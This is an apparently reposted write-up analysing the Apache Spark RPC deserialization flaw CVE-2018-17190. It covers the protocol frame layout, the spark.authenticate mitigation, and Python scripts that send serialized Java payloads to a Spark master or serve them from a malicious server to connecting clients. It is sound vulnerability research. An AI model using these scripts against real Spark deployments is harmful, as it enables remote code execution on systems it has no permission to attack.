2025-04-05 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report --
How do you analyze the deserialization vulnerability in the Apache Spark RPC protocol? This article walks through the analysis and the corresponding exploitation in detail, in the hope of giving readers who want to investigate this problem a simple, workable approach.
Preface
Not long ago, the Spark project issued a security announcement entitled "CVE-2018-17190: Unsecured Apache Spark standalone executes user code".
The announcement indicates that all versions are affected; no fixed version is given, only mitigation measures.
The official mitigation is: enable authentication on any Spark standalone cluster that is not otherwise secured against unwanted access (for example, by network-level restrictions), using spark.authenticate and the related security properties.
Consulting the relevant documentation shows that spark.authenticate is a configuration property of the RPC layer; it controls whether Spark RPC uses a shared secret for authentication.
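As a concrete sketch of that mitigation, the relevant properties can be set in conf/spark-defaults.conf. spark.authenticate and spark.authenticate.secret are real Spark properties; the secret value below is a placeholder, and on a standalone cluster the same secret must be configured on every node:

```properties
# conf/spark-defaults.conf -- enable shared-secret authentication for Spark RPC
spark.authenticate         true
# On standalone clusters the same secret must be set on all nodes
# (on YARN, Spark generates and distributes the secret automatically).
spark.authenticate.secret  change-me-to-a-long-random-string
```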
Spark RPC
Spark RPC is a custom protocol. The underlying implementation is based on netty4, and the related code is encapsulated in spark-network-common.jar and spark-core.jar, where the former is written in Java and the latter in Scala.
Each protocol frame consists of two parts, a header and a body. The header contains the length of the entire frame (8 bytes), the message type (1 byte), the requestID (8 bytes), and the body length (4 bytes).
The body varies according to the message type defined by the protocol.
The body of an RpcRequest message is roughly constructed in two parts: the first half carries the addresses, ports, and endpoint name of the two communicating sides, followed by Java-serialized content beginning with the magic bytes ac ed 00 05.
The body of an RpcResponse message is directly the Java-serialized content.
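The header layout described above can be sketched in Python. Note that the concrete message-type ids (RpcRequest = 3, RpcResponse = 4) and the big-endian packing are assumptions based on Spark's Message.Type enum and netty conventions, not something stated in the article:

```python
import struct

# Assumed message-type ids, based on Spark's Message.Type enum; the exact
# values are not given in the article and may differ between versions.
RPC_REQUEST = 3
RPC_RESPONSE = 4

def build_frame(msg_type: int, request_id: int, body: bytes) -> bytes:
    """Pack one frame: 8-byte total frame length, 1-byte message type,
    8-byte requestID, 4-byte body length, then the body (big-endian)."""
    header = struct.pack(">BQI", msg_type, request_id, len(body))
    # The leading length field counts the entire frame, including itself.
    return struct.pack(">Q", 8 + len(header) + len(body)) + header + body

def parse_frame(frame: bytes):
    """Inverse of build_frame: returns (msg_type, request_id, body)."""
    assert struct.unpack(">Q", frame[:8])[0] == len(frame)
    msg_type, request_id, body_len = struct.unpack(">BQI", frame[8:21])
    return msg_type, request_id, frame[21:21 + body_len]
```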
Build a standalone Spark cluster
Download Spark from the official website, then start the master, using -h to bind the listener to all interfaces and -p to set the port: ./start-master.sh -h 0.0.0.0 -p 7077
Prove that there is a deserialization process on the server
The spark_exploit.py script takes the connection information of the remote Spark cluster as its first and second parameters; the third parameter is a Java deserialization payload.
It calls a build_msg function to pack the payload into a message and send it to the server; the process is fairly simple.
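The original spark_exploit.py is not reproduced in the article, so the following is a hypothetical reconstruction along the lines just described. It treats the payload file as the full message body; a real RpcRequest body would additionally carry the address/endpoint envelope described earlier, and the message-type id is an assumption:

```python
import socket
import struct
import sys

RPC_REQUEST = 3  # assumed Message.Type id for RpcRequest; may vary by version

def build_msg(request_id: int, body: bytes) -> bytes:
    # Frame layout from the protocol analysis above: 8-byte frame length,
    # 1-byte message type, 8-byte requestID, 4-byte body length, then body.
    header = struct.pack(">BQI", RPC_REQUEST, request_id, len(body))
    return struct.pack(">Q", 8 + len(header) + len(body)) + header + body

def send_payload(host: str, port: int, payload_path: str) -> None:
    # The payload file holds a serialized gadget chain (e.g. produced by
    # ysoserial) and therefore starts with the magic bytes ac ed 00 05.
    with open(payload_path, "rb") as f:
        payload = f.read()
    with socket.create_connection((host, port)) as sock:
        sock.sendall(build_msg(1, payload))

if __name__ == "__main__" and len(sys.argv) == 4:
    send_payload(sys.argv[1], int(sys.argv[2]), sys.argv[3])
```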
Attacking the client in reverse
The evil_spark_server.py script implements a simple TCP service by subclassing BaseRequestHandler: it extracts the request_id from the data the client sends, then calls build_msg to return a well-formed RPC response, composed of that request_id and the payload, to the client.
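The original evil_spark_server.py is likewise not shown, so here is a hypothetical sketch of the same idea using Python's socketserver module. The PAYLOAD constant and the RpcResponse type id are placeholders and assumptions; in a real attack the payload would be a full serialized gadget chain:

```python
import socketserver
import struct

RPC_RESPONSE = 4  # assumed Message.Type id for RpcResponse; may vary by version
# Placeholder for a serialized Java gadget chain (ac ed 00 05 magic bytes).
PAYLOAD = b"\xac\xed\x00\x05"

def build_msg(msg_type: int, request_id: int, body: bytes) -> bytes:
    # Same frame layout as the protocol analysis: 8-byte frame length,
    # 1-byte message type, 8-byte requestID, 4-byte body length, then body.
    header = struct.pack(">BQI", msg_type, request_id, len(body))
    return struct.pack(">Q", 8 + len(header) + len(body)) + header + body

class EvilSparkHandler(socketserver.BaseRequestHandler):
    """Answers whatever the client sends with an RpcResponse carrying
    PAYLOAD, echoing back the client's request_id so the response looks
    legitimate to the connecting Spark client."""

    def handle(self):
        data = self.request.recv(4096)
        if len(data) < 17:
            return
        # The request_id sits after the 8-byte frame length and 1-byte type.
        request_id = struct.unpack(">Q", data[9:17])[0]
        self.request.sendall(build_msg(RPC_RESPONSE, request_id, PAYLOAD))

def serve(port: int = 7077) -> None:
    # Blocks forever; intended to be run standalone from the command line.
    with socketserver.TCPServer(("0.0.0.0", port), EvilSparkHandler) as srv:
        srv.serve_forever()
```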
Start the service
Use the Spark client to connect
By capturing packets to observe the request data and reading the relevant code, the structure of the RPC protocol's request data was worked out step by step. Both the client and the server use Java serialization to transfer data, so both sides can be exploited.
When it came to actually executing system commands through deserialization, a search of ysoserial turned up no suitable gadget, short of constructing an exploitation chain against an earlier JDK version.
Over time, the vulnerabilities in each library get fixed and upgraded, existing gadgets stop working, and Java deserialization vulnerabilities will eventually become a thing of the past.
This concludes the analysis of the deserialization vulnerability in the Apache Spark RPC protocol. I hope the above content is of some help to you.